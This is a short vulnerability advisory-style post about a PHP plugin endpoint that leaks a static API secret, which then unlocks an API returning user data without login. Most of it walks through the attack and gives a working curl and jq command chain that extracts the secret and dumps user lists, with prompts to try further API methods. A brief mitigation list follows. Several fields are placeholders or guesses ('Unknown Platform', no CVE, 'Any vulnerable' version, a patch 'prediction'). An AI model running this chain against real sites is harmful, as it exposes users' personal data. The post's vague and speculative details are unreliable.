Unknown Platform, Information Disclosure, CVE-Not-Provided (Critical)

By /

Listen to this Post

How the CVE works (technical details):

  1. The endpoint `objects/plugins.json.php` is publicly accessible without authentication.
  2. This script returns a JSON object containing plugin metadata, including a field named APISecret.
  3. The `APISecret` is a static token used by the API endpoint `plugin/API/get.json.php` to authenticate requests.
  4. An attacker sends a GET request to `objects/plugins.json.php` to retrieve the raw JSON.
  5. The response includes the `APISecret` in plaintext under plugin.object_data.
  6. The attacker extracts the `APISecret` value using a simple regex or JSON parser.
  7. The API endpoint `plugin/API/get.json.php` expects two parameters: `APIName` and APISecret.
  8. It does not verify the request origin or session; it only checks if the provided `APISecret` matches the stored value.
  9. By supplying the stolen secret, the attacker bypasses all authentication mechanisms.
  10. The API method `users_list` is protected but trusts the `APISecret` as sufficient proof.
  11. The attacker can call `users_list` with additional parameters like `rowCount` and current.
  12. The response returns sensitive user data (usernames, emails, roles, etc.) without any login.
  13. The vulnerability exists because `plugins.json.php` should be restricted to admin users only.
  14. No rate limiting or brute-force protection is applied to either endpoint.
  15. The secret is hardcoded or generated once, making it a static shared secret.
  16. An attacker can also discover other API methods by fuzzing `APIName` parameter.
  17. The API may allow write operations (e.g., user_add, config_set) if exposed.
  18. Logging does not record unauthenticated accesses to `plugins.json.php` in many deployments.
  19. The issue is a combination of insecure direct object reference (IDOR) and broken authentication.
  20. Exploitation requires only a single HTTP request to leak the secret, then a second to abuse the API.

dailycve form:

Platform: Generic PHP
Version: Any vulnerable
Vulnerability: Unauthenticated secret leak
Severity: Critical
Date: 2025-03-15

Prediction: Patch within 48h

What Undercode Say:

Leak APISecret
curl -s 'http://target/objects/plugins.json.php' | jq '.plugin.object_data.APISecret'
Exploit API using stolen secret
SECRET=$(curl -s 'http://target/objects/plugins.json.php' | jq -r '.plugin.object_data.APISecret')
curl -G 'http://target/plugin/API/get.json.php' \
--data-urlencode "APIName=users_list" \
--data-urlencode "APISecret=$SECRET" \
--data-urlencode "rowCount=10" \
--data-urlencode "current=1"

Exploit:

1. GET `/objects/plugins.json.php` → extract `APISecret`.

2. GET `/plugin/API/get.json.php?APIName=users_list&APISecret=&rowCount=3&current=1` → dump users.

  1. Repeat for other `APIName` values (e.g., user_roles, system_info).

Protection from this CVE:

  • Move `plugins.json.php` behind admin authentication (session cookie or bearer token).
  • Regenerate `APISecret` and store it hashed; API should validate using a time‑limited nonce.
  • Implement IP whitelisting or rate limiting on the API endpoint.
  • Disable public access to any `.json.php` files via `.htaccess` or web server rules.

Impact:

  • Full read of user database (names, emails, hashed passwords if exposed).
  • Potential privilege escalation by calling `user_update` or `role_assign` API methods.
  • Complete compromise of the application’s backend data.
  • No authentication required, enabling automated attacks.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top